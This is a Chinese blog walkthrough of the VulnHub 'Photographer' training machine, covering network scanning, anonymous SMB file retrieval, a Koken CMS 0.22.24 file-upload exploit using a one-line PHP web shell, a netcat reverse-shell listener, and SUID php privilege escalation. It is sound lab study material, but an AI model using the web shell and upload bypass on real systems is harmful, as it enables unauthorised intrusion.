VulnHub_Photographer

最新推荐文章于 2024-09-14 20:25:32 发布
最新推荐文章于 2024-09-14 20:25:32 发布
阅读量169 收藏 1
点赞数
文章标签: git 安全 apache nginx nmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45434762/article/details/108271674
版权


发现目标主机

使用netdiscover扫描局域网主机

sudo netdiscover -r 192.168.44.0/24

扫描主机开放端口

通过nmap扫描主机开放端口,我们可以看到目标主机开放了一下端口:

  • 80:Apache/2.4.18

  • 139:netbios-ssn Samba smbd 3.X - 4.X

  • 445:netbios-ssn Samba smbd 4.3.11-Ubuntu

  • 8000:Apache/2.4.18 运行koken 0.22.24


通过上面的扫描结果可以看到目标主机开放了445端口,我们匿名访问可以得到一些文件

sudo smbclient //192.168.44.144/sambashare


下载这两个文件

smb: \> get wordpress.bkp.zip
getting file \wordpress.bkp.zip of size 13930308 as wordpress.bkp.zip (76857.7 KiloBytes/sec) (average 76857.7 KiloBytes/sec)
smb: \> get mailsent.txt
getting file \mailsent.txt of size 503 as mailsent.txt (35.1 KiloBytes/sec) (average 71226.7 KiloBytes/sec)


查看了wordpress备份文件没有发现有用的信息
查看mailsent.txt发现有一提示语Don't forget your secret, my babygirl ;)猜测这个可能是账户的密码。

我们接着看一下之前扫描到的8000端口,打开之后是一个Koken搭建的网站

通过最开始的扫描我们可以基本判断是Koken0.22.24版本,我们上SearchSpolit搜索找到一个可以移动的文件上传漏洞

searchsploit Koken


查看漏洞利用方法

1. Create a malicious PHP file with this content:


   <?php system($_GET['cmd']);?>


2. Save as "image.php.jpg"


3. Authenticated, go to Koken CMS Dashboard, upload your file on "Import Content" button (Library panel) and send the HTTP request to Burp.


4. On Burp, rename your file to "image.php"


通过对8000端口目录的扫描发现可能存在admin目录

打开之后发下是一个登录界面需要邮箱账号和密码

回想刚才mailsent.txt中的内容,我们用里面的邮箱和提示语作为密码来进行登录,发现可以登录成功


创建一个shell文件

使用BurpSuit抓包上传

查看上传的文件

通过后台Download File可以确定文件的路径

使用菜刀连接小马返现无法连接成功

我们重新上传冰蝎3.0的马,连接成功

使用冰蝎创建一个反弹shell,首先用nc在kali中监听

sudo nc -lvp 8899


配置冰蝎

kali查看反弹shell

尝试了很多次冰蝎的马无法创建交互式shell,最终使用kali中usr/share/webshell/php/中的反弹马进行创建shell,并成功创建交互式shell
使用python创建交互式shell

最后使用/usr/bin/php7.2进行提权

最终拿到Flagd41d8cd98f00b204e9800998ecf8427e

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

NowSec
关注
Photographer
03-25
...每个元素都有开始标签和结束标签,例如`<p>`和`</p>`用于创建段落。元素可以嵌套,形成层次结构。 2. **元信息与头部**:`<head>`标签包含页面的元信息,如字符编码(`<meta charset="UTF-8">`)、页面标题(`...
photographer-portfolio
04-04
"photographer-portfolio"是一个可能代表摄影师个人作品集或在线展示平台的项目。根据标签"JavaScript",我们可以推断这个项目主要使用JavaScript编程语言来构建,可能是为了实现动态交互效果和用户界面。JavaScript...
vulnhub Photographer: 1
箭雨镜屋
07-20 954
渗透思路:nmap扫描 ---- 手工发现CMS版本和已知漏洞 ---- SMB匿名登录发现CMS用户名和密码 ---- 利用Koken CMS 0.22.24任意文件上传漏洞getshell ---- php suid提权
Vulnhub-Photographer1
dahege666的博客
06-17 279
练习
vulnhub-Photographerr-渗透笔记
yutianovo的博客
08-04 878
靶机描述 博客地址 http://blog.yutian233.xyz/ This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt. https://www.vulnhub.com/entry/photographer-1,519/ 端口扫描 nmap -A -p
看完这篇 教你玩转渗透测试靶机Vulnhub——Photographer: 1
Aluxian_的博客
09-25 655
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:这个是单独系列,只有一个靶机,老样子需要获得root权限找到flagmedium2.发现漏洞 搜索相关漏洞并进行分析利用3.文件上传漏洞得利用上传shell.php回弹shell BP抓包改包4.SUID php🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
vulnhub靶机-Photographer: 1
臭nana的博客
08-09 2392
1、找到靶机ip:192.168.8.168 nmap -sn 192.168.8.0/24 2、扫描靶机端口 root@kali:~# nmap -A -p- 192.168.8.168 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for photographer (192.168.8.168) Host is up (0.00051s latency). Not shown: 65531 closed ports POR
PyPI 官网下载 | hlpl_photographer-1.0.0.tar.gz
02-01
《PyPI官网下载hlpl_photographer-1.0.0.tar.gz——探索Python库与云原生技术》 PyPI(Python Package Index)是Python社区的重要资源库,它为全球开发者提供了海量的Python库,方便用户下载和分享。本文将深入探讨...
photographer
04-18
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何...
vulhub——Photographer:1
战神/calmness的博客
08-12 609
目录 信息收集 SMB共享服务 访问80端口 访问8000 端口 目录遍历 文件上传 提权 下载链接:https://download.vulnhub.com/photographer/Photographer.ova 信息收集 root@kali:~# nmap -sC 192.168.243.155 --script=vuln Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-11 22:37 EDT Nmap scan re
【kali-信息收集】(1.8)ARP侦查工具_Netdiscover
08-02 1285
【kali-信息收集】ARP侦查工具
网段扫描/主机发现-netdiscover/nmap/arp-scan
-
06-24 2256
网段扫描-netdiscover/nmap/arp-scan
Netdiscover网络扫描工具
测试开发小记
04-08 7885
目录Netdiscover安装Netdiscover选项Netdiscover使用用法使用实例 Netdiscover是一种网络扫描工具,通过ARP扫描发现活动主机,可以通过主动和被动两种模式进行ARP扫描。通过主动发送ARP请求检查网络ARP流量,通过自动扫描模式扫描网络地址。本文介绍Netdiscover的安装和使用方法。 Netdiscover安装 Kali Linux提供的网络扫描工具 github地址:https://github.com/alexxy/netdiscover ubuntu: $
Netdiscover基本使用
热门推荐
weixin_45329009的博客
08-31 1万+
Netdiscover:二层发现工具,拥有主动和被动发现两种方式。 基本用法: 在不知道它的用法之前首先查看它的帮助: 最简单的就是直接输入netdiscover之后就是运行它的默认配置然后扫描局域网中所有的机器这个会非常慢。 1.指定IP段:比如10.10.10.0 选择你监听的网卡:比如eth0 -p 被动模式。默默的侦听指定的网卡以发现别的二层主机 -t ARP包发送间隔。单位毫秒...
【原创】Kali 中的ARP侦查工具:netdiscover
赵庆明老师
04-20 475
命令简介 └─$ man -k netdiscover netdiscover (8) - active/passive ARP reconnaissance tool 命令实战 └─$ sudo netdiscover Currently scanning: 192.168.3.0/16 | Screen View: Unique Hosts 65 Captured ARP Req/Rep packets, from 34 hosts. Total size: 3900 __
渗透测试命令系列之 - netdiscover
Rio的博客
02-14 1274
root@kali:~# netdiscover -h Netdiscover 0.3-pre-beta7 [Active/passive arp reconnaissance tool] Written by: Jaime Penalba jpenalbae@gmail.com Usage: netdiscover [-i device] [-r range | -l file | -p] [-...
基于ARP的网络扫描工具netdiscover
weixin_34097242的博客
05-08 474
2019独角兽企业重金招聘Python工程师标准>>> ...
git gc
qq_41505080的博客
09-14 774
丢弃的提交对象是指那些不再被任何分支或标签引用的提交。它们可以通过删除分支、重置提交、合并或变基操作等方式产生。Git 使用垃圾回收(git gc)来处理这些丢弃的对象,通过标记、清理和压缩来优化存储空间。通过适当的垃圾回收和prune设置,可以有效地管理这些丢弃的提交对象。被reflog引用的提交不会被认为是垃圾。reflog记录了分支和其他引用的操作历史,这些记录有助于恢复丢失的提交。垃圾回收(git gc)会考虑reflog中的条目来决定哪些对象仍然被引用,并且只有在reflog。
git子模块处理的一些方法
最新发布
fpcc的专栏
09-14 245
用得越多,遇到的问题也越多,这就是经验的来源。经验是一个好的东西,也是一个不好的东西。它让人可以快速的处理实际问题也可以让人固化于这种思维。至于如何打破这种边界,需要自己不断的学习,与时俱进。
photographerphotographic发音为何不同
03-28
Photographerphotographic的发音不同,是因为它们分别是名词和形容词,音节分布不同。Photographer中的“graph”读作/ɡræf/,而photographic中的“graph”读作/ɡrɑːf/。此外,photographer的强读音在第二个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值